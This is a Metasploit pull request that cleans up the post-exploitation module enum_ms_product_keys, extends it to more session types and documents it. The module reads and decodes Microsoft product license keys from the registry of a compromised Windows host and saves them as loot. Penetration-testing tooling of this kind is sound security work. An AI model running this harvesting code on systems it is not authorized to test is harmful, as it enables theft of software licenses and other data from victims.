### PR TITLE
enum_ms_product_keys: Cleanup and support non-meterpreter sessions

### DIFF
--- a/documentation/modules/post/windows/gather/enum_ms_product_keys.md
+++ b/documentation/modules/post/windows/gather/enum_ms_product_keys.md
@@ -1,0 +1,38 @@
+## Vulnerable Application
+
+This module will enumerate Microsoft product license keys.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_ms_product_keys`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+## Scenarios
+
+### Windows 7 Professional SP1 (x64)
+
+```
+msf6 > use post/windows/gather/enum_ms_product_keys
+msf6 post(windows/gather/enum_ms_product_keys) > set session 1
+session => 1
+msf6 post(windows/gather/enum_ms_product_keys) > run
+
+[*] Finding Microsoft product keys on TEST (192.168.200.190)
+
+Keys
+====
+
+ Product                 Registered Owner  Registered Organization  License Key
+ -------                 ----------------  -----------------------  -----------
+ Windows 7 Professional  Windows User                               N0TMY-K3Y55-N0TMY-K3Y55-N0TMY
+ Windows 7 Professional  Windows User                               N0TMY-K3Y55-N0TMY-K3Y55-N0TMY
+
+
+[+] Product keys stored in: /root/.msf4/loot/20220814092725_default_192.168.200.190_host.ms_keys_579592.txt
+[*] Post module execution completed
+```

--- a/modules/post/windows/gather/enum_ms_product_keys.rb
+++ b/modules/post/windows/gather/enum_ms_product_keys.rb
@@ -6,111 +6,127 @@
 class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
 
-  def initialize(info={})
-    super(update_info(info,
-        'Name'          => 'Windows Gather Product Key',
-        'Description'   => %q{ This module will enumerate the OS license key },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Brandon Perry <bperry.volatile[at]gmail.com>'],
-        'Platform'      => [ 'win' ],
-        'SessionTypes'  => [ 'meterpreter' ]
-      ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather Product Key',
+        'Description' => %q{ This module will enumerate Microsoft product license keys. },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => %w[meterpreter powershell shell],
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
   end
 
   def app_list
     tbl = Rex::Text::Table.new(
-      'Header'  => "Keys",
-      'Indent'  => 1,
+      'Header' => 'Keys',
+      'Indent' => 1,
       'Columns' =>
         [
-          "Product",
-          "Registered Owner",
-          "Registered Organization",
-          "License Key"
-        ])
+          'Product',
+          'Registered Owner',
+          'Registered Organization',
+          'License Key'
+        ]
+    )
 
     keys = [
-      [ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId4" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574" ],
-      [ "HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId" ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion', 'DigitalProductId' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion', 'DigitalProductId4' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}', 'DigitalProductId' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}', 'DigitalProductId' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}', 'DigitalProductId' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}', 'DigitalProductId' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}', 'DigitalProductId' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup', 'DigitalProductId' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID', 'DigitalProductId77654' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID', 'DigitalProductId77574' ],
+      [ 'HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup', 'DigitalProductId' ],
     ]
 
+    wow64 = !sysinfo.nil? && sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
+
     keys.each do |keyx86|
+      # parent key
+      p = keyx86[0, 1].join
 
-      #parent key
-      p = keyx86[0,1].join
+      # child key
+      c = keyx86[1, 1].join
 
-      #child key
-      c = keyx86[1,1].join
-
-      key      = nil
-      keychunk = registry_getvaldata(p, c)
-      key      = decode(keychunk.unpack("C*")) if not keychunk.nil?
-
-      appname = registry_getvaldata(p, "ProductName")
-      rowner  = registry_getvaldata(p, "RegisteredOwner")
-      rorg    = registry_getvaldata(p, "RegisteredOrganization")
-
-      #In some cases organization info might not be there even though
-      #there's a licenses key
-      rorg = '' if rorg.nil?
-      rowner = '' if rowner.nil?
-      appname = p if appname.nil?
-
-      #Only save info if appname, rowner, and key are found
-      if not appname.nil? and not rowner.nil? and not key.nil?
-        tbl << [appname,rowner,rorg,key]
+      if wow64
+        keychunk = registry_getvaldata(p, c, REGISTRY_VIEW_64_BIT)
+        appname = registry_getvaldata(p, 'ProductName', REGISTRY_VIEW_64_BIT)
+        rowner = registry_getvaldata(p, 'RegisteredOwner', REGISTRY_VIEW_64_BIT)
+        rorg = registry_getvaldata(p, 'RegisteredOrganization', REGISTRY_VIEW_64_BIT)
+      else
+        keychunk = registry_getvaldata(p, c)
+        appname = registry_getvaldata(p, 'ProductName')
+        rowner = registry_getvaldata(p, 'RegisteredOwner')
+        rorg = registry_getvaldata(p, 'RegisteredOrganization')
       end
+
+      next if keychunk.nil?
+
+      key = decode(keychunk.unpack('C*'))
+
+      next if key.nil?
+
+      tbl << [
+        appname.nil? ? p : appname,
+        rowner.to_s,
+        rorg.to_s,
+        key
+      ]
     end
 
-    #Only save data to disk when there's something in the table
-    if not tbl.rows.empty?
-      results = tbl.to_csv
-      print_line("\n" + tbl.to_s + "\n")
-      path = store_loot("host.ms_keys", "text/plain", session, results, "ms_keys.txt", "Microsoft Product Key and Info")
-      print_good("Keys stored in: #{path.to_s}")
+    if tbl.rows.empty?
+      print_status('Found no Microsoft product keys')
+      return
     end
+
+    results = tbl.to_csv
+    print_line("\n#{tbl}\n")
+    path = store_loot('host.ms_keys', 'text/plain', session, results, 'ms_keys.txt', 'Microsoft Product Key and Info')
+    print_good("Product keys stored in: #{path}")
   end
 
   def decode(chunk)
     start = 52
-    finish = start + 15
 
-    #charmap idex
+    # charmap idex
     alphas = %w[B C D F G H J K M P Q R T V W X Y 2 3 4 6 7 8 9]
 
     decode_length = 29
     string_length = 15
 
-    #product ID in coded bytes
+    # product ID in coded bytes
     product_id = Array.new
 
-    #finished and finalized decoded key
-    key = ""
+    # finished and finalized decoded key
+    key = ''
 
-    #From byte 52 to byte 67, inclusive
-    (52).upto(67) do |i|
-      product_id[i-start] = chunk[i]
+    # From byte 52 to byte 67, inclusive
+    52.upto(67) do |i|
+      product_id[i - start] = chunk[i]
     end
 
-    #From 14 down to 0, decode each byte in the
-    #currently coded product_id
-    (decode_length-1).downto(0) do |i|
-
+    # From 14 down to 0, decode each byte in the
+    # currently coded product_id
+    (decode_length - 1).downto(0) do |i|
       if ((i + 1) % 6) == 0
-        key << "-"
+        key << '-'
       else
-        mindex = 0 #char map index
+        mindex = 0 # char map index
 
-        (string_length-1).downto(0) do |s|
+        (string_length - 1).downto(0) do |s|
           t = ((mindex << 8) & 0xffffffff) | product_id[s]
           product_id[s] = t / 24
           mindex = t % 24
@@ -120,11 +136,12 @@ class MetasploitModule < Msf::Post
       end
     end
 
-    return key.reverse
+    key.reverse
   end
 
   def run
-    print_status("Finding Microsoft key on #{sysinfo['Computer']}")
+    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
+    print_status("Finding Microsoft product keys on #{hostname} (#{session.session_host})")
     app_list
   end
 end


### PR DESCRIPTION
Resolves Rubocop violations.

Adds documentation.

Adds `Notes` module meta information.

Adds support for non-Meterpreter sessions.

Add support for WOW64 Meterpreter sessions.
